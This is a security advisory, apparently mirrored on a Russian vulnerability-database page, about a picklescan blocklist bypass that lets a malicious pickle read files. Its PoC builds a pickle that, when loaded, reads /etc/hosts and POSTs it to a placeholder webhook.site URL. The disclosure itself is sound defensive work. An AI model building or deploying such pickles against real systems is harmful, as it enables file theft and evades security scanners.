GHSA-9726-w42j-3qjr

Опубликовано: 08 янв. 2026

Источник: github

Github: Прошло ревью

CVSS4: 8.8

Описание

picklescan has Arbitrary file read using io.FileIO

Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

io.FileIO: Opens local files without using builtins.open.
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

PoC

import pickle, io, urllib.request class GetFile: def __reduce__(self): return (io.FileIO, ('/etc/hosts', 'r')) class Exfiltrate: def __reduce__(self): return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile())) with open("bypass_http.pkl", "wb") as f: pickle.dump(Exfiltrate(), f)

Impact

Arbitrary file read

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.

Ссылки

Пакеты

Наименование

picklescan

pip

Затронутые версииВерсия исправления

< 0.0.35

0.0.35

8.8 High

CVSS4

Дефекты

CWE-22

CWE-918

8.8 High

CVSS4

Дефекты

CWE-22

CWE-918